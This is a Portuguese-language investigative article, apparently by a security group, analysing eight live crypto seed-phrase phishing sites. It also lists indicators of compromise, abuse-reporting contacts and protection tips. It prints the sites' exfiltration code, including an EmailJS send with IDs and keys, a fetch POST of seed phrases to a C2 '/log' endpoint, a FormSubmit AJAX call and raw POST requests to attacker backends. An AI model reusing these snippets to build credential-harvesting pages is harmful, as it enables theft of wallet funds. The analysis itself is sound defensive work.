Voltar às notícias
Investigação aprofundada

Anatomia do phishing relacionado a criptomoedas:
8 Ataques Reais Analisados

Interceptamos tráfego de phishing em tempo real, realizamos engenharia reversa em cinco programas de roubo de frases-semente e rastreamos os dados roubados até bots do Telegram, contas do EmailJS e back-ends de Phishing-as-a-Service.

27 de março de 2026 Pesquisa PhishDestroy 18 minutos de leitura
Análise detalhada de uma investigação de phishing envolvendo criptomoedas
A análise em tempo real do tráfego de phishing interceptado revela toda a infraestrutura do ataque
8Sites analisados
7Métodos de exfiltração
1,824+Dados de acesso roubados
380+Marcas de carteiras
$0Custo do atacante

O que descobrimos

Todos os dias, milhares de usuários de criptomoedas perdem seus fundos para sites de phishing que parecem idênticos aos serviços legítimos de carteiras. Mas o que acontece atrás de O botão falso “Connect Wallet”? Para onde vai, na verdade, sua frase-semente?

Interceptamos o tráfego HTTP em tempo real de cinco sites de phishing ativos, baixamos seu código-fonte completo e rastreamos cada ponto de exfiltração de dados até seu destino final. Esta investigação revela toda a anatomia do crypto-phishing moderno — desde os truques de engenharia social que levam você a digitar sua frase-semente até o bot do Telegram que a envia ao invasor em tempo real.

Isenção de responsabilidade

Todas as frases-semente apresentadas neste artigo são dados de teste gerados aleatoriamente. Nenhuma informação de acesso real foi comprometida durante esta investigação. Todos os sites foram denunciados aos respectivos provedores de hospedagem e departamentos de combate a abusos.

O Padrão Universal de Ataque

Apesar das diferenças na identidade visual e nos back-ends, todos os 8 sites de phishing seguem o exatamente o mesmo funil psicológico:

Página de destinoConstrução de confiança
Seletor de carteiras60–110+ logotipos
Mensagem falsa “Conectando...”Temporizador de 3 a 5 segundos
"Falha na conexão"Sempre dá errado
Entrada manualSemente / Chave / Armazenamento de chaves
ExfiltraçãoTG / E-mail / API

A observação fundamental: a animação “Conectando...” é sempre programado para falhar. No código-fonte do Site nº 4, encontramos const success = false — não há nenhuma tentativa de conexão com a carteira. Todo o fluxo existe exclusivamente para direcionar as vítimas ao formulário “Conectar manualmente”.

Cadeia de ataque de phishing com criptomoedas em seis etapas
A cadeia de ataque universal de seis etapas comum a todos os sites de phishing que analisamos

Os 8 sites: análise detalhada

1
Protocolo da camada de rede
networklayers.pages.dev
Ao vivoCloudflare PagesBot do Telegram + EmailJS

Falsificação de identidade

Um “protocolo descentralizado” fictício para validação de carteiras. Utiliza tickers de preços em tempo real do CryptoCompare e links para exploradores de blockchain reais (Ethereum, BSC, Polygon, Avalanche, Solana, Cardano) para conferir credibilidade. A página inicial exibe mais de 100 logotipos de carteiras e um processo de “validação” em três etapas.

A cadeia dupla de exfiltração

O backend mais sofisticado dos cinco — todas as credenciais roubadas são enviadas por meio de dois canais independentes simultaneamente:

Victim submits seed phrase
  |
  +--> Channel 1: axios POST --> Express.js on Render.com
  |      |
  |      +--> Telegram Bot API --> @metatech2 (instant DM)
  |
  +--> Channel 2: fetch POST --> EmailJS API
         |
         +--> Bestgrace309@gmail.com (email backup)

Conclusões da OSINT

IndicadorValor
E-mail de golpistaBestgrace309@gmail.com
Bot do Telegram@DewdropsTG_bot (ID: 7567323692)
Destinatário do Telegram@metatech2 (ID do chat: 7350941887)
Back-endemailjs-backend-ovtg.onrender.com
Serviço EmailJSservice_d5qigxs / template_7bqxeaa
Domínio ocultolayerschain.in (proveniente da ofuscação de e-mail do CF)
Mensagens enviadas1.824+ (a partir do `message_id` do Telegram)
Idade do domínio2 dias (TLS: 25 de março de 2026)
Falha na OPSEC

O e-mail do invasor foi encontrado em um Comentário em JavaScript dentro config.js: // Bestgrace309@gmail.com. Eles se esqueceram de removê-lo antes da implantação. Além disso, o backend do relé do Telegram é totalmente aberto — sem autenticação, sem limitação de taxa. Ao decodificar o Cloudflare data-cfemail Além da ofuscação no HTML, também descobrimos um e-mail oculto: support@layerschain.in, conectando-se à infraestrutura de hospedagem da Índia e da África do Sul.

2
Migração do token AQLA
token-aqla.pages.dev
Ao vivoCloudflare PagesFormulários não estáticos

Falsificação de identidade

Uma reprodução perfeita, pixel por pixel, da realidade Aqualibre (AQLA) página de migração de tokens. O código HTML contém uma tag de metadados que revela a fonte: data-scrapbook-source="https://token.aqla.app/migration", com data de 19 de novembro de 2024.

A abordagem “zero código”

Esse invasor requer sem código do lado do servidor. O formulário envia os dados diretamente para Não estático — um backend de formulário legítimo para sites estáticos. Cada envio é encaminhado para o e-mail do golpista. O e-mail do atacante é nunca aparece no código-fonte.

<form action="https://forms.un-static.com/forms/c78173e2d991...94c3f76">
  <textarea name="phrase"></textarea>
  <input name="private-key" />
  <textarea name="keystore-json"></textarea>
  <input name="password" />
</form>
Custo: $0

Cloudflare Pages: gratuito. Formulários não estáticos: gratuito. Sem domínios adquiridos. Sem servidores alugados. Custo total da infraestrutura: zero dólares.

3
SafePal Typosquat
antiresolve-mysafpalnode.pages.dev
Ao vivo Cloudflare Pages Formulários não estáticos

Falsificação de identidade

O subdomínio contém "safpal" — um erro ortográfico deliberado de SafePal, uma carteira de hardware popular. O site se apresenta como “Blockchain Wallet Rectification”, com 26 categorias de notícias falsas. Utiliza o Typed.js para animar os nomes das cadeias (Ethereum, BSC, Polygon...) e um ticker do LiveCoinWatch para dar credibilidade.

O mesmo kit, o mesmo operador?

Utiliza o exatamente o mesmo modelo de phishing como Local nº 2: idêntico connect.html, idêntico wallets.html com mais de 60 logotipos, no mesmo backend do Un-static (ID de formulário diferente — 6f1b82c3...da9943af). O fato de o kit ser idêntico sugere fortemente que um operador responsável por ambos os locais.

Erros no código: “Privay Policy” (falta um ‘c’), “seperated” (deveria ser “separated”), “Kestore” (falta um ‘y’). O campo de senha usa type="text" em vez de type="password".

4
Clone da Flare Network
flaremainnet.pages.dev
Ao vivoCloudflare PagesEmailJS duplo (redundância)

Falsificação de identidade

Um clone quase perfeito do Rede Flare portal — uma blockchain EVM de Camada 1 de verdade, com os protocolos FTSO e Data Connector. Reproduz mais de 30 parceiros do ecossistema, a navegação e a identidade visual. Favicons carregados a partir de um domínio typosquat: portal.flaremainet.com (falta um “n” em “mainnet”).

Redundância dupla do EmailJS

O único site que usa duas contas separadas do EmailJS simultaneamente para redundância contra remoções:

// Channel 1: EmailJS SDK
emailjs.send('service_6dt5h1k', 'template_hjqp9gb', payload)
// Key: Sza6lhzA9hKHrm1k4

// Channel 2: jQuery AJAX direct
$.ajax('https://api.emailjs.com/api/v1.0/email/send', {
  data: { service_id: 'service_isy47de',
          template_id: 'template_dkk4d1b',
          user_id: 'JsVEgXVcaSTro1etu' }
})

Assunto do e-mail para cada roubo: "New Wallet Details from Flare".

Esta é uma empresa que conta com financiamento

O HTML contém Google Tag Manager (GTM-WX2D2TR), Microsoft Clarity (j4bllybjkp), Proteção PPC do Lunio, e um Pixel do Twitter/X Ads. O invasor está executando publicidade paga para direcionar as vítimas ao site de phishing e filtrar os cliques dos bots. Isso não é um hobby — é uma operação financiada, com análises e investimento em publicidade.

Site de phishing da Flare Network com EmailJS e publicidade paga
Site nº 4: anúncios pagos, rastreamento analítico e exfiltração dupla — a operação mais profissional
5
COIN NODE / Correção da carteira (PhaaS)
swiftauthapps.pages.dev
Backend inoperanteAPI PulseResolve (PhaaS)

Falsificação de identidade

Um serviço genérico de “COIN NODE” / “Wallet Fix” (sem marca específica). Direitos autorais “Wallet Fix 2022” — este modelo de kit tem pelo menos 4 anos. Imagens hospedadas em pumpeth.com (WordPress na AWS).

Phishing como Serviço

A arquitetura de back-end mais preocupante: uma API multilocatária baseada em UUID:

POST https://api.pulseresolve.com/a26db20c-1dc4-4208-a60a-c2c3b22c02ef
Content-Type: multipart/form-data

wallet=Metamask&type=phrase&phrase=buddy+surprise+vapor+river+...

Cada golpista recebe seu próprio endpoint UUID. Um operador central mantém a API, acompanha as campanhas e, possivelmente, fica com uma parte dos fundos roubados. Isso é roubo industrializado de criptomoedas — um modelo de “phishing como serviço”.

Infraestrutura relacionada (praticamente inativa)

DomínioFunçãoStatus
api.pulseresolve.comAPI de exfiltraçãoNXDOMAIN
walletissuesfix.netHospedagem de faviconsNXDOMAIN
syncwallet.onlineApresentador do LogoNXDOMAIN
pumpeth.comCDN de imagensEm produção (AWS)
Zombie Frontend

O backend está inoperante, mas o O front-end ainda está no ar on Cloudflare Pages. Se o invasor fizer um novo registro pulseresolve.com, o site volta a funcionar imediatamente.

6
Central de Suporte + Recuperação do Ledger
wallet-support-39n.pages.dev & ledger-recovery.support
Ao vivoCloudflare Pages + ReplitAPI C2 personalizadaPreenchimento automático do BIP39

Falsificação de identidade

A operação em duas frentes: um “Centro de Suporte” genérico em wallet-support-39n.pages.dev com 15 categorias de emissão falsas e 39 marcas de carteiras, além de um Clone da experiência de integração do Ledger com precisão de pixel em ledger-recovery.support hospedado no Replit — incluindo seleção do modelo do dispositivo, configuração do PIN e uma tabela com a frase-semente de 24 palavras com autocompletar BIP39 de verdade.

Backend C2 do Anti-Scanner

A página de suporte da carteira envia os dados roubados para api.uranustoken.org/log — um servidor C2 personalizado com nginx/Ubuntu atrás do Cloudflare. O back-end desvia intencionalmente todas as solicitações GET (retorna o erro 522 – tempo limite esgotado), respondendo apenas a solicitações POST. Isso significa que os verificadores de URL, os rastreadores do Google Safe Browsing e os pesquisadores de segurança que enviam solicitações GET para o endpoint não veem nada — o C2 parece inativo.

// config.js — C2 config exposed in plaintext
const config = {
  serverURL: "https://api.uranustoken.org",
  allowedWallets: ["phantom","solfare","metamask","trustwallet",
    "coinbasewallet","ledger","trezor","okx","sui","backpack",
    "tonkeeper","magiceden","slush" /* + 26 more */]
};
window.IWMConfig = config;

// Exfiltration function (deobfuscated from bundle)
function Ae(seedPhrase, passPhrase, walletName) {
  fetch(serverURL + "/log", {
    method: "POST",
    headers: {"Content-Type": "application/json"},
    body: JSON.stringify({seedPhrase, passPhrase, walletName, apiKey})
  })
}

O clone do Ledger executa um backend Express.js separado no próprio Replit: POST /api/recovery-phrase coletando {deviceId, pin, phrase}. Ele retorna 400 {"error":"Invalid data provided"} em caso de entrada inválida — confirmando que o backend está em funcionamento e em constante validação dados roubados.

Conclusões da OSINT

IndicadorValor
Front-end (Carteira)wallet-support-39n.pages.dev
Front-end (Ledger)ledger-recovery.support (34.111.179.208)
Backend C2 api.uranustoken.org → nginx/1.24.0 Ubuntu
IPs C2104.21.60.163 / 172.67.198.35 (Cloudflare)
Replit Verifya43d3852-5304-47af-a61b-f0f6f3912736
SecretárioName.com (ledger-recovery.support)
Implantado9 de janeiro de 2026 (cabeçalho “Última modificação”)
Pilha de tecnologias React + Vite + Tailwind v4.1 + Framer Motion
Maior fidelidade à experiência do usuário

O pacote JS de 466 KB contém o lista completa de palavras do BIP39 para o preenchimento automático em tempo real, 67 referências a “frase-senha” e 39 a “mnemônico”. O clone do Ledger conduz as vítimas pelo mesmo fluxo de integração de um dispositivo Ledger original — a página de phishing mais convincente de toda esta investigação. O apiKey O campo na configuração sugere um arquitetura PhaaS multilocatária.

7
Plataforma de lançamento descentralizada
mainnetvalidationapp.pages.dev
Ao vivoCloudflare PagesFormSubmit.co

Falsificação de identidade

Uma “Plataforma de Lançamento Descentralizada” genérica com 21 categorias de iscas (Staking, Migração, KYC, Sorteio, Resgate de recompensas, Recuperação de ativos, Pré-venda, Cunhagem de NFTs, Contas bloqueadas...) e Mais de 70 marcas de carteiras — uma das listas de carteiras mais completas que encontramos. O erro ortográfico revelador “Sychronize” (faltando o ‘n’) denuncia a falsificação.

The FormSubmit Pipeline

Usos FormSubmit.co — um serviço legítimo de envio de formulários por e-mail. O hash do endpoint a2cf4131f1a5d39453c7c183df96f86f é o MD5 do endereço de e-mail do golpista. Realizamos um ataque de força bruta em centenas de padrões de e-mail no Gmail, Yahoo, Hotmail, ProtonMail, Yandex e Mail.ru — não foi encontrado nenhum resultado. O golpista usa um endereço de e-mail incomum ou gerado aleatoriamente.

// Exfiltration via jQuery AJAX → FormSubmit → scammer email
$.ajax({
    url: "https://formsubmit.co/ajax/a2cf4131f1a5d39453c7c183df96f86f",
    method: "POST",
    dataType: "JSON",
    data: {
        dappWord: seedPhrase,       // THE STOLEN SEED PHRASE
        dappName: walletName,       // Which wallet was selected
        linkName: "DAPP DECENTRALIZED"  // Campaign identifier
    }
});

Conclusões da OSINT

IndicadorValor
Domíniomainnetvalidationapp.pages.dev
Hash de envio de formulárioa2cf4131f1a5d39453c7c183df96f86f
ID da campanhaDAPP DESCENTRALIZADO
Kit FontAwesomebdc3291137 (kit nº 112310842, versão gratuita 6.7.2)
jQuery3.2.1 + 3.5.1 carregados simultaneamente
BootstrapCSS 5.2.2 + JS 5.3.0-alpha1 (incompatibilidade)
Duas alças de transporte

Kit FontAwesome bdc3291137 — O FontAwesome consegue identificar o titular da conta associado a esse ID de kit. A tag da campanha DAPP DECENTRALIZED pode aparecer em outros sites de phishing que utilizem o mesmo hash do FormSubmit. Após roubar a frase-semente, um código QR falso e código de referência aleatório de 7 caracteres são exibidas as seguintes mensagens: “Entre em contato com o administrador com seu código de referência exclusivo” — deixando as vítimas à espera, em vez de investigar o caso.

8
R2 Bucket + PHP no computador de casa
pub-519769e9eb634616b1746c2018641d56.r2.dev
MortoCloudflare R2PHP + DDNS

Falsificação de identidade

Desconhecido — tanto o front-end quanto o back-end estão fora do ar. Com base na estrutura da carga útil, tratava-se de um programa para roubar a frase-semente de uma carteira de criptomoedas. O Bucket público do Cloudflare R2 (armazenamento de objetos, não o Pages) é um vetor de phishing bem documentado com mais de 5.000 páginas maliciosas identificadas e um aumento de 61 vezes no tráfego relatado pela Netskope.

A configuração do “script kiddie”

O mais operação primitiva nesta coleção. As frases-semente são enviadas palavra por palavra para um script PHP em execução em um computador doméstico ou VPS por meio de um serviço gratuito de DNS dinâmico:

POST mercifuljigga4real123.publicvm.com/fuc.php
Content-Type: application/x-www-form-urlencoded

pass=Word+1:+finger+%0AWord+2:+flag+%0AWord+3:+across
    +%0AWord+4:+admit+%0AWord+5:+weather+%0AWord+6:+fragile
    +%0AWord+7:+trick+%0AWord+8:+weekend+%0AWord+9:+gift
    +%0AWord+10:+grit+%0AWord+11:+borrow+%0AWord+12:+access

Conclusões da OSINT

IndicadorValor
Front-end pub-519769e9eb634616b1746c2018641d56.r2.dev [OFFLINE]
Back-end mercifuljigga4real123.publicvm.com [NXDOMAIN]
ID do balde R2519769e9eb634616b1746c2018641d56
Provedor de DDNS DNSExit.com / Netdorm, Inc. (Cincinnati, OH)
DNS NSns10–13.dnsexit.com
Nome de usuáriomercifuljigga4real123
Nome de usuário no OSINT: mercifuljigga4real123

"Merciful" + "jigga" (apelido de Jay-Z) + "4real" + "123" — um apelido claramente pessoal que sugere afinidade com a cultura do hip-hop. Não encontrado em qualquer plataforma indexada: GitHub, X, Instagram, TikTok, Reddit, YouTube, Twitch ou Steam. Provavelmente ativo no Discord, no Telegram ou em plataformas de jogos com esse nome ou variações semelhantes. O nome do arquivo fuc.php combina com o estilo irreverente da alça.

7 maneiras de roubar sua frase-semente

Comparação entre quatro métodos de exfiltração de dados por meio de phishing no mundo das criptomoedas
Sete arquiteturas distintas de exfiltração utilizadas nos oito sites de phishing
MétodoLocaisComo funcionaVelocidadeCusto
Bot do Telegram#1 O Express.js no Render.com redireciona para a API do Bot. O golpista recebe uma mensagem direta instantânea com as credenciais. Em tempo real$0
EmailJS#1, #4 O JavaScript do lado do cliente envia diretamente para a API do EmailJS, que, por sua vez, encaminha a mensagem para o e-mail do golpista. ~1 min$0
Formulários não estáticos#2, #3 Formulário HTML padrão com envio do tipo POST para um serviço de formulários legítimo que encaminha os envios por e-mail. ~1 min$0
FormSubmit.co#7 jQuery AJAX para FormSubmit.co. Endereço de e-mail oculto por um hash MD5. Campanha marcada como “DAPP DECENTRALIZED”. ~1 min$0
API C2 personalizada#6 O React SPA envia as solicitações para a API do nginx/Express, que está atrás do Cloudflare. Rejeita solicitações GET (522) para evitar scanners. Responde apenas ao POST. Em tempo real~$5/mês
PHP + DDNS#8 Script em PHP em um computador doméstico por meio de um serviço gratuito de DNS dinâmico (publicvm.com). A frase-semente é enviada palavra por palavra. Em tempo real$0
API do PhaaS#5 API multilocatária baseada em UUID. Um operador central gerencia o back-end, enquanto os golpistas alugam endpoints. Em tempo realDesconhecido

7 sinais de alerta que revelam qualquer site de phishing

Se você vir qualquer Se for o caso, feche a aba imediatamente:

1. A mensagem “Falha na conexão” é sempre falsa

As conexões com carteiras reais utilizam o protocolo WalletConnect ou extensões de navegador. Elas nunca exibem um erro do tipo “Falha na conexão” que solicite que você digite sua frase-semente.

2. 50–110+ logotipos de carteiras, um único destino

Cada ícone de carteira leva ao mesmo formulário. Um serviço de verdade integraria o SDK específico de cada carteira.

3. “Erro” após o envio

O falso “Erro 503” ou “Erro desconhecido” exibido após o envio é intencional. Seus dados já foram roubados — o erro serve para induzi-lo a tentar novamente com outra carteira.

4. Hospedado em .pages.dev

Todos os 5 sites abusam do plano gratuito do Cloudflare Pages. Não é necessária verificação de identidade. Os casos de abuso para fins de phishing no Cloudflare Pages aumentaram 198% em 2025.

5. Três guias: Frase / Chave privada / Armazenamento de chaves

Nenhum serviço legítimo precisa dos três tipos de credenciais. Esse formulário com três abas é uma característica típica de um kit de phishing.

6. Sem interação com a blockchain

Nenhum desses sites carrega ethers.js, web3.js, nem fazem chamadas RPC. São formulários HTML puros que fingem ser dApps.

7. Infraestrutura de custo zero

Hospedagem gratuita + serviços de formulários gratuitos + mensagens gratuitas = uma operação completa de phishing por US$ 0. Se o site não tiver um domínio válido, desconfie.

Tabela completa do IOC

Para equipes de segurança, plataformas de inteligência contra ameaças e denunciantes de abusos:

Domínios e Infraestrutura

DomínioTipoStatus
networklayers.pages.devInterface de phishingAo vivo
token-aqla.pages.devInterface de phishingAo vivo
antiresolve-mysafpalnode.pages.devInterface de phishingAo vivo
flaremainnet.pages.devInterface de phishingAo vivo
swiftauthapps.pages.devInterface de phishingAo vivo
emailjs-backend-ovtg.onrender.comBackend do relé TGAo vivo
portal.flaremainet.comAtivos de typosquatDesconhecido
layerschain.inDomínio relacionadoDNS fora do ar
api.pulseresolve.comBack-end do PhaaSNXDOMAIN
walletissuesfix.netHospedagem de ativosNXDOMAIN
syncwallet.onlineApresentador do LogoNXDOMAIN
pumpeth.comCDN de imagensEm produção (AWS)
wallet-support-39n.pages.devInterface de phishingAo vivo
ledger-recovery.supportPhishing no Ledger (Replit)Ao vivo
api.uranustoken.orgBack-end C2 (nginx/Ubuntu)Ao vivo
uranustoken.orgDomínio raiz404
mainnetvalidationapp.pages.devInterface de phishingAo vivo
pub-519769e9eb634616b1746c2018641d56.r2.devPhishing (categoria R2)Offline
mercifuljigga4real123.publicvm.comBack-end em PHP (DDNS)NXDOMAIN

Contas e identificadores

TipoValorSite
E-mailBestgrace309@gmail.com#1
E-mail (oculto)support@layerschain.in#1
Bot do Telegram@DewdropsTG_bot (7567323692)#1
Usuário do Telegram@metatech2 (7350941887)#1
EmailJS #1service_d5qigxs / I-7q0Bs-ilK3rFcWj#1
EmailJS #2service_6dt5h1k / Sza6lhzA9hKHrm1k4#4
EmailJS #3service_isy47de / JsVEgXVcaSTro1etu#4
Formulário não estáticoc78173e2d991...94c3f76#2
Formulário não estático6f1b82c3ce55...da9943af#3
UUID do PhaaSa26db20c-1dc4-4208-a60a-c2c3b22c02ef#5
GTMGTM-WX2D2TR#4
MS Clarityj4bllybjkp#4
Instância de renderizaçãorndr-id: ed83576e-b1b3-4c82#1
Replit Verifya43d3852-5304-47af-a61b-f0f6f3912736#6
MD5 do envio do formulárioa2cf4131f1a5d39453c7c183df96f86f#7
Tag da campanhaDAPP DESCENTRALIZADO#7
Kit FontAwesomebdc3291137 (kit nº 112310842)#7
ID do balde R2519769e9eb634616b1746c2018641d56#8
Nome de usuário/DDNSmercifuljigga4real123#8

Onde denunciar casos de phishing relacionado a criptomoedas

Onde denunciar sites de phishing relacionados a criptomoedas — remoções por múltiplos vetores
Visando simultaneamente serviços de hospedagem, serviços de back-end e plataformas de mensagens para obter a máxima velocidade de remoção
ServiçoO que relatarComo
Cloudflare7 contas .pages.dev + 1 bucket R2abuse.cloudflare.com
Google Safe BrowsingTodos os URLs de phishingDenunciar phishing
PhishTankTodas as URLs da lista de bloqueios da comunidadephishtank.org
EmailJS3 contas com uso indevido (IDs de serviço acima)abuse@emailjs.com
Não estático2 pontos finais do formulárioEntre em contato pelo site un-static.com
Render.comBack-end de retransmissão do TelegramExibir formulário de denúncia de abuso
Telegram@DewdropsTG_bot + @metatech2telegram.org/support
Google (Gmail)Bestgrace309@gmail.comDenúncia de abuso no Google
Twitter/XConta de publicidade promovendo o Site nº 4Denúncia de abuso de anúncios do X
FormSubmit.coHash a2cf4131... (n.º 7)Formulário de denúncia de abuso do FormSubmit
Replitledger-recovery.support (#6)Denúncia de abuso no Replit
Name.comRegistrador do site ledger-recovery.supportAbuso no Name.com
DNSExitmercifuljigga4real123.publicvm.comAbuso no site dnsexit.com
FontAwesomeKit bdc3291137 (n.º 7)Uso indevido do FontAwesome
ChainabuseTodas as campanhas de phishingChainabuse.com

Como se proteger

A Regra de Ouro

Nenhum serviço legítimo jamais pedirá que você digite sua frase-semente em um site. As frases-semente só devem ser inseridas no software oficial da carteira durante a recuperação da carteira — nunca em sites de terceiros que ofereçam serviços de “validação”, “sincronização” ou “recuperação”.

Antes de conectar qualquer carteira:

  • Verifique se a URL corresponde ao domínio oficial. Verifique os detalhes do certificado SSL.
  • O WalletConnect original utiliza um código QR ou um link direto — nunca um formulário de frase-semente.
  • Se a “conexão falhar” e você for solicitado a inserir suas credenciais manualmente — trata-se de phishing.
  • Verifique URLs suspeitos em PhishTank ou VirusTotal antes de interagir.
  • Use uma carteira de hardware — ela exige confirmação física para cada transação.
  • Salve os URLs oficiais nos favoritos. Nunca clique em links de anúncios, mensagens diretas ou redes sociais.

A Taxonomia do Crypto-Phishing

Os ladrões de frases-semente são apenas uma categoria. Aqui está o panorama completo do phishing em criptomoedas — iremos adicionar análises detalhadas sobre cada tipo.

Rouba-frases-semente
Páginas falsas da “Connect Wallet” que tentam induzir você a digitar sua frase de recuperação. O foco deste artigo: 5 exemplos reais analisados em detalhes.
Abordado acima
Sequestro de aprovação
dApps maliciosos que solicitam aprovações ilimitadas de tokens por meio do MetaMask. Uma vez aprovadas, o invasor esvazia sua carteira sem precisar da sua frase-semente.
Em breve
Phishing no gelo (Permit2)
Aproveita as autorizações sem consumo de gás da EIP-2612. A vítima assina uma mensagem fora da cadeia que concede direitos de transferência de tokens — nenhuma aprovação na cadeia é visível até o momento da drenagem.
Em breve
Alegações falsas sobre airdrops
Airdrops de tokens falsos que exigem que você “resgate” por meio de um contrato inteligente malicioso. A transação de resgate, na verdade, transfere seus tokens reais para fora.
Em breve
Programas que se apropriam da área de transferência
Malware que monitora sua área de transferência e, sem que você perceba, substitui os endereços de carteira copiados pelo endereço do invasor antes de você colá-los.
Em breve
Pó + Envenenamento
Pequenas transações provenientes de endereços semelhantes contaminam seu histórico. A vítima copia o endereço falso do histórico de transações para sua próxima transferência.
Em breve

A Verdade Inconfortável

Custos para montar uma operação de phishing envolvendo criptomoedas $0 e leva menos de 30 minutos. Hospedagem gratuita, serviços de formulários gratuitos, bots de mensagens gratuitos. O invasor por trás do Site nº 1 já obteve credenciais de Mais de 1.824 vítimas. O local nº 4 está em funcionamento publicidade paga em grande escala. Isso não é brincadeira de amador — é uma indústria. A única defesa é a conscientização.

Ajude-nos a reagir

O PhishDestroy rastreia e denuncia sites de phishing relacionados a criptomoedas em tempo real. Se você se deparar com um site suspeito, denuncie-o para nós — vamos investigar e trabalhar para que ele seja retirado do ar.

Investigações relacionadas

Investigação
O fim do xmrwallet.com: a NameSilo mentiu para proteger um ladrão de M
Roubo de Monero que durou 10 anos. Três registradores estiveram envolvidos. A NameSilo inventou sete mentiras.
Análise aprofundada
Redes de drenagem de criptomoedas: infraestrutura exposta
Como as operações de “drainer-as-a-service” compartilham infraestrutura e operadores.
Painel à mostra
Painel de phishing do Trust Wallet: acesso administrativo total
Acessamos o painel de administração de uma operação de phishing da Trust Wallet.
Infraestrutura
Infraestrutura de golpes exposta: back-ends compartilhados
Como as operações fraudulentas compartilham servidores, modelos e fluxos de pagamento.

Compartilhe esta investigação

X / Twitter Telegram Reddit LinkedIn

Investigações relacionadas

Painel sobre o caso de phishing da Trust Wallet: US$ 239 mil roubados, 6 operadores
INVESTIGAÇÃO APROFUNDADA
Painel sobre o caso de phishing da Trust Wallet: US$ 239 mil roubados, 6 operadores
Kit de ferramentas Crypto Drainer: revendedores do Angel Drainer são desmascarados
INVESTIGAÇÃO APROFUNDADA
Kit de ferramentas Crypto Drainer: revendedores do Angel Drainer são desmascarados
Golpistas desmascarados: análise detalhada de quatro sistemas de back-end de golpes
INVESTIGAÇÃO
Golpistas desmascarados: análise detalhada de quatro sistemas de back-end de golpes